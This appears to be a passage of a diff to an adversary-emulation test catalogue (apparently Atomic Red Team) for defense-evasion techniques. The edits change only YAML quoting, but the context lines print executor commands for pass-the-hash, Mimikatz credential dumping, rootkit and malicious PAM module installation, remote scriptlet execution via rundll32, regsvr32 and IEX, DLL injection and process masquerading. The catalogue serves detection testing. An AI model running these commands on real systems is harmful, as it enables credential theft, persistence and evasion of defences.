+ '
name: command_prompt
- name: crackmapexec Pass the Hash
auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9
description: 'command execute with crackmapexec
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -35729,14 +35729,14 @@ defense-evasion:
- description: 'CrackMapExec executor must exist on disk at specified location
(#{crackmapexec_exe})
-'
+ '
prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Automated installer not implemented yet, please
install crackmapexec manually at this location: #{crackmapexec_exe}
-'
+ '
executor:
command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n"
name: command_prompt
@@ -35817,7 +35817,7 @@ defense-evasion:
auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098
description: 'Similar to PTH, but attacking Kerberos
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -35834,10 +35834,10 @@ defense-evasion:
dependencies:
- description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe})
-'
+ '
prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
@@ -35848,7 +35848,7 @@ defense-evasion:
executor:
command: '#{mimikatz_exe} "kerberos::ptt #{ticket}"
-'
+ '
name: command_prompt
- name: Rubeus Kerberos Pass The Ticket
auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb
@@ -35891,19 +35891,19 @@ defense-evasion:
dependencies:
- description: 'Rubeus must exist on disk at specified location (#{rubeus_path})
-'
+ '
prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path}
-'
+ '
- description: 'PsExec must exist on disk at specified location (#{psexec_path})
-'
+ '
prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -35986,7 +35986,7 @@ defense-evasion:
description: 'Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -35999,14 +35999,14 @@ defense-evasion:
- description: 'AtomicPasswordFilter.dll must exist on disk at specified location
(#{input_dll})
-'
+ '
prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own password filter
dll"
-'
+ '
executor:
command: |
$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
@@ -36428,10 +36428,10 @@ defense-evasion:
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
-'
+ '
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
-'
+ '
- name: Malicious PAM module
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
description: |
@@ -36465,35 +36465,35 @@ defense-evasion:
- description: 'The PAM development library must be installed to build the PAM
module
-'
+ '
prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit
0; else exit 1; fi;
-'
+ '
get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install
libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel;
fi
-'
+ '
- description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module})
-'
+ '
prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1;
fi;
-'
+ '
get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
-'
+ '
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
-'
+ '
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
-'
+ '
T1205.001:
technique:
object_marking_refs:
@@ -36932,13 +36932,13 @@ defense-evasion:
cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
Ignore
-'
+ '
name: powershell
- name: RunPE via VBA
auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
description: 'This module executes notepad.exe from within the WINWORD.EXE process
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -36950,7 +36950,7 @@ defense-evasion:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -36961,7 +36961,7 @@ defense-evasion:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -37085,7 +37085,7 @@ defense-evasion:
dependencies:
- description: 'The 64-bit version of Microsoft Office must be installed
-'
+ '
prereq_command: |
try {
$wdApp = New-Object -COMObject "Word.Application"
@@ -37096,7 +37096,7 @@ defense-evasion:
get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
manually to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -37131,7 +37131,7 @@ defense-evasion:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
-'
+ '
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -37146,10 +37146,10 @@ defense-evasion:
- description: 'PsExec tool from Sysinternals must exist on disk at specified
location (#{psexec_path})
-'
+ '
prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
@@ -37160,7 +37160,7 @@ defense-evasion:
command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa
/inject /id:500" "exit"
-'
+ '
name: command_prompt
elevation_required: false
T1055.008:
@@ -37306,7 +37306,7 @@ defense-evasion:
description: 'Executes the signed PubPrn.vbs script with options to download
and execute an arbitrary payload.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -37318,7 +37318,7 @@ defense-evasion:
command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
localhost "script:#{remote_payload}"
-'
+ '
name: command_prompt
T1542.004:
technique:
@@ -37631,7 +37631,7 @@ defense-evasion:
description: 'Executes the Uninstall Method, No Admin Rights Required. Upon
execution, "I shouldn''t really execute either." will be displayed.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -37648,10 +37648,10 @@ defense-evasion:
- description: 'The CSharp source file must exist on disk at specified location
(#{source_file})
-'
+ '
prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}"
@@ -37661,7 +37661,7 @@ defense-evasion:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
cleanup_command: 'del #{output_file} >nul 2>&1
-'
+ '
name: command_prompt
- name: Regsvcs Uninstall Method Call Test
auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126
@@ -37684,10 +37684,10 @@ defense-evasion:
- description: 'The CSharp source file must exist on disk at specified location
(#{source_file})
-'
+ '
prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}"
@@ -37776,7 +37776,7 @@ defense-evasion:
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls. Upon execution, calc.exe will be launched.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -37796,10 +37796,10 @@ defense-evasion:
dependencies:
- description: 'Regsvr32.sct must exist on disk at specified location (#(unknown))
-'
+ '
prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#(unknown)"
@@ -37834,7 +37834,7 @@ defense-evasion:
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls. Upon execution, calc.exe will be launched.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -37855,10 +37855,10 @@ defense-evasion:
- description: 'AllTheThingsx86.dll must exist on disk at specified location
(#{dll_name})
-'
+ '
prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}"
@@ -37866,14 +37866,14 @@ defense-evasion:
command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe
/s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} )
-'
+ '
name: command_prompt
- name: Regsvr32 Registering Non DLL
auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421
description: 'Replicating observed Gozi maldoc behavior registering a dll with
an altered extension
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -37893,13 +37893,13 @@ defense-evasion:
dependencies:
- description: 'Test requires a renamed dll file
-'
+ '
prereq_command: 'if exist #{dll_file} ( exit 0 ) else ( exit 1 )
-'
+ '
get_prereq_command: 'copy "C:\Windows\System32\shell32.dll" "#{dll_file}"
-'
+ '
executor:
name: command_prompt
elevation_required: false
@@ -38015,7 +38015,7 @@ defense-evasion:
%SystemRoot%\Temp\lsass.exe /B
cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
-'
+ '
name: command_prompt
- name: Masquerading as Linux crond process.
auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556
@@ -38031,7 +38031,7 @@ defense-evasion:
echo 'sleep 5' | /tmp/crond
cleanup_command: 'rm /tmp/crond
-'
+ '
name: sh
- name: Masquerading - cscript.exe running as notepad.exe
auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0
@@ -38047,7 +38047,7 @@ defense-evasion:
cmd.exe /c %APPDATA%\notepad.exe /B
cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1
-'
+ '
name: command_prompt
- name: Masquerading - wscript.exe running as svchost.exe
auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23
@@ -38063,7 +38063,7 @@ defense-evasion:
cmd.exe /c %APPDATA%\svchost.exe /B
cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1
-'
+ '
name: command_prompt
- name: Masquerading - powershell.exe running as taskhostw.exe
auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa
@@ -38079,7 +38079,7 @@ defense-evasion:
cmd.exe /K %APPDATA%\taskhostw.exe
cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
-'
+ '
name: command_prompt
- name: Masquerading - non-windows exe running as windows exe
auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086
@@ -38102,10 +38102,10 @@ defense-evasion:
dependencies:
- description: 'Exe file to copy must exist on disk at specified location (#{inputfile})
-'
+ '
prereq_command: 'if (Test-Path #{inputfile}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}"
@@ -38116,14 +38116,14 @@ defense-evasion:
Stop-Process -ID $myT1036_003
cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Masquerading - windows exe running as different windows exe
auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0
description: 'Copies a windows exe, renames it as another windows exe, and launches
it to masquerade as second windows exe
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -38142,7 +38142,7 @@ defense-evasion:
Stop-Process -ID $myT1036_003
cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Malicious process Masquerading as LSM.exe
auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f
@@ -38486,7 +38486,7 @@ defense-evasion:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
-'
+ '
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -38500,10 +38500,10 @@ defense-evasion:
- description: 'PsExec tool from Sysinternals must exist on disk at specified
location (#{psexec_path})
-'
+ '
prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -38536,7 +38536,7 @@ defense-evasion:
Write-Host "End of DCShadow"
cleanup_command: 'Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore
-'
+ '
T1014:
technique:
object_marking_refs:
@@ -38614,7 +38614,7 @@ defense-evasion:
auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553
description: 'Loadable Kernel Module based Rootkit
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -38634,11 +38634,11 @@ defense-evasion:
dependencies:
- description: 'The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
-'
+ '
prereq_command: 'if [ -f #{rootkit_path}/#{rootkit_name}.ko ]; then exit 0;
else exit 1; fi;
-'
+ '
get_prereq_command: |
sudo apt install make
sudo apt install gcc
@@ -38651,7 +38651,7 @@ defense-evasion:
executor:
command: 'sudo insmod #{rootkit_path}/#{rootkit_name}.ko
-'
+ '
cleanup_command: |
sudo rmmod #{rootkit_name}
sudo rm -rf #{rootkit_path}
@@ -38661,7 +38661,7 @@ defense-evasion:
auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f
description: 'Loadable Kernel Module based Rootkit
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -38681,11 +38681,11 @@ defense-evasion:
dependencies:
- description: 'The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
-'
+ '
prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then
exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: "sudo apt install make\nsudo apt install gcc\nif [ ! -d
/tmp/T1014 ]; then mkdir /tmp/T1014; touch /tmp/T1014/safe_to_delete; fi;\ncp
#{rootkit_source_path}/* /tmp/T1014\ncd /tmp/T1014; make \nsudo cp
@@ -38694,7 +38694,7 @@ defense-evasion:
executor:
command: 'sudo modprobe #{rootkit_name}
-'
+ '
cleanup_command: |
sudo modprobe -r #{rootkit_name}
sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
@@ -38797,32 +38797,32 @@ defense-evasion:
dependencies:
- description: 'MSI file must exist on disk at specified location (#{msi_file_path})
-'
+ '
prereq_command: 'if (Test-Path #{msi_file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{msi_file_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi" -OutFile "#{msi_file_path}"
- description: 'CAB file must exist on disk at specified location (#{cab_file_path})
-'
+ '
prereq_command: 'if (Test-Path #{cab_file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: "New-Item -Type Directory (split-path #{cab_file_path})
-ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab\"
-OutFile \"#{cab_file_path}\" \n"
- description: 'Old version of Virtualbox must be installed
-'
+ '
prereq_command: 'if (Test-Path "C:\Program Files\Oracle\VirtualBox\VboxC.dll")
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'msiexec /i #{msi_file_path} /qn
-'
+ '
executor:
command: |
"C:\Program Files\Oracle\VirtualBox\VBoxSVC.exe" /reregserver
@@ -38873,20 +38873,20 @@ defense-evasion:
dependencies:
- description: 'VirtualBox must exist on disk at specified locations (#{virtualbox_exe})
-'
+ '
prereq_command: 'if (Test-Path "#{virtualbox_exe}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
$wc = New-Object System.Net.WebClient
$wc.DownloadFile("#{virtualbox_download}","$env:TEMP\#{virtualbox_installer}")
start-process -FilePath "$env:TEMP\#{virtualbox_installer}" -ArgumentList "--silent" -Wait
- description: 'VBoxManage must exist on disk at specified locations (#{vboxmanage_exe})
-'
+ '
prereq_command: 'if (Test-Path "#{vboxmanage_exe}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
$wc = New-Object System.Net.WebClient
$wc.DownloadFile("#{virtualbox_download}","$env:TEMP\#{virtualbox_installer}")
@@ -38923,11 +38923,11 @@ defense-evasion:
prereq_command: 'if ((Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V).State
= "Enabled") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V
-All -Force
-'
+ '
executor:
name: powershell
elevation_required: true
@@ -39010,7 +39010,7 @@ defense-evasion:
description: 'Test execution of a remote script using rundll32.exe. Upon execution
notepad.exe will be opened.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -39021,7 +39021,7 @@ defense-evasion:
executor:
command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
-'
+ '
name: command_prompt
- name: Rundll32 execute VBscript command
auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb
@@ -39039,7 +39039,7 @@ defense-evasion:
executor:
command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
-'
+ '
name: command_prompt
- name: Rundll32 advpack.dll Execution
auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89
@@ -39058,17 +39058,17 @@ defense-evasion:
dependencies:
- description: 'Inf file must exist on disk at specified location (#{inf_to_execute})
-'
+ '
prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
executor:
command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
-'
+ '
name: command_prompt
- name: Rundll32 ieadvpack.dll Execution
auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9
@@ -39088,17 +39088,17 @@ defense-evasion:
dependencies:
- description: 'Inf file must exist on disk at specified location (#{inf_to_execute})
-'
+ '
prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
executor:
command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
-'
+ '
name: command_prompt
- name: Rundll32 syssetup.dll Execution
auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125
@@ -39117,10 +39117,10 @@ defense-evasion:
dependencies:
- description: 'Inf file must exist on disk at specified location (#{inf_to_execute})
-'
+ '
prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
@@ -39128,7 +39128,7 @@ defense-evasion:
command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall
128 .\#{inf_to_execute}
-'
+ '
name: command_prompt
- name: Rundll32 setupapi.dll Execution
auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19
@@ -39147,10 +39147,10 @@ defense-evasion:
dependencies:
- description: 'Inf file must exist on disk at specified location (#{inf_to_execute})
-'
+ '
prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
@@ -39158,7 +39158,7 @@ defense-evasion:
command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128
.\#{inf_to_execute}
-'
+ '
name: command_prompt
- name: Execution of HTA and VBS Files using Rundll32 and URL.dll
auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3
@@ -39181,7 +39181,7 @@ defense-evasion:
description: 'Executes the LaunchApplication function in pcwutl.dll to proxy
execution of an executable.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -39192,7 +39192,7 @@ defense-evasion:
executor:
command: 'rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}
-'
+ '
name: command_prompt
- name: Execution of non-dll using rundll32.exe
auto_generated_guid: ae3a8605-b26e-457c-b6b3-2702fd335bac
@@ -39212,18 +39212,18 @@ defense-evasion:
dependencies:
- description: 'Non-dll file must exist on disk at specified location
-'
+ '
prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
-'
+ '
executor:
name: powershell
command: 'rundll32.exe #{input_file}, StartW
-'
+ '
- name: Rundll32 with Ordinal Value
auto_generated_guid: 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0
description: "Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer.
@@ -39243,18 +39243,18 @@ defense-evasion:
dependencies:
- description: 'DLL file must exist on disk at specified location
-'
+ '
prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
-'
+ '
executor:
name: command_prompt
command: 'rundll32.exe #{input_file},#2
-'
+ '
- name: Rundll32 with Control_RunDLL
auto_generated_guid: e4c04b6f-c492-4782-82c7-3bf75eb8077e
description: "Rundll32.exe loading dll with 'control_rundll' within the command-line,
@@ -39274,18 +39274,18 @@ defense-evasion:
dependencies:
- description: 'DLL file must exist on disk at specified location
-'
+ '
prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
-'
+ '
executor:
name: command_prompt
command: 'rundll32.exe shell32.dll,Control_RunDLL #{input_file}
-'
+ '
T1134.005:
technique:
object_marking_refs:
@@ -39761,7 +39761,7 @@ defense-evasion:
description: 'Change Service registry ImagePath of a bengin service to a malicious
file
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -39781,22 +39781,22 @@ defense-evasion:
dependencies:
- description: 'The service must exist (#{weak_service_name})
-'
+ '
prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
-'
+ '
executor:
command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
/f /v ImagePath /d "#{malicious_service_path}"
-'
+ '
cleanup_command: 'sc.exe delete #{weak_service_name}
-'
+ '
name: command_prompt
T1548.001:
technique:
@@ -39852,7 +39852,7 @@ defense-evasion:
description: 'Make, change owner, and change file attributes on a C source code
file
-'
+ '
supported_platforms:
- macos
- linux
@@ -39878,7 +39878,7 @@ defense-evasion:
auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79
description: 'This test sets the SetUID flag on a file in Linux and macOS.
-'
+ '
supported_platforms:
- macos
- linux
@@ -39894,14 +39894,14 @@ defense-evasion:
sudo chmod u+s #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
-'
+ '
name: sh
elevation_required: true
- name: Set a SetGID flag on file
auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c
description: 'This test sets the SetGID flag on a file in Linux and macOS.
-'
+ '
supported_platforms:
- macos
- linux
@@ -39917,7 +39917,7 @@ defense-evasion:
sudo chmod g+s #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
-'
+ '
name: sh
elevation_required: true
- name: Make and modify capabilities of a binary
@@ -39949,7 +39949,7 @@ defense-evasion:
description: 'This test gives a file the capability to set UID without using
flags.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -39963,7 +39963,7 @@ defense-evasion:
sudo setcap cap_setuid=ep #{file_to_setcap}
cleanup_command: 'rm #{file_to_setcap}
-'
+ '
name: sh
elevation_required: true
T1218:
@@ -40022,7 +40022,7 @@ defense-evasion:
description: 'Injects arbitrary DLL into running process specified by process
ID. Requires Windows 10.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -40038,17 +40038,17 @@ defense-evasion:
dependencies:
- description: 'T1218.dll must exist on disk at specified location (#{dll_payload})
-'
+ '
prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"
executor:
command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
-'
+ '
name: command_prompt
elevation_required: true
- name: SyncAppvPublishingServer - Execute arbitrary PowerShell code
@@ -40056,7 +40056,7 @@ defense-evasion:
description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
Requires Windows 10.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -40067,14 +40067,14 @@ defense-evasion:
executor:
command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}"
-'
+ '
name: command_prompt
- name: Register-CimProvider - Execute evil dll
auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655
description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also
note this dll can be served up via SMB
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -40086,17 +40086,17 @@ defense-evasion:
dependencies:
- description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload})
-'
+ '
prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
executor:
command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
-'
+ '
name: command_prompt
- name: InfDefaultInstall.exe .inf Execution
auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef
@@ -40115,17 +40115,17 @@ defense-evasion:
dependencies:
- description: 'INF file must exist on disk at specified location (#{inf_to_execute})
-'
+ '
prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"
executor:
command: 'InfDefaultInstall.exe #{inf_to_execute}
-'
+ '
name: command_prompt
- name: ProtocolHandler.exe Downloaded a Suspicious File
auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2
@@ -40133,7 +40133,7 @@ defense-evasion:
Office. On successful execution you should see Microsoft Word launch a blank
file.
-'
+ '
supported_platforms:
- windows
input_arguments:
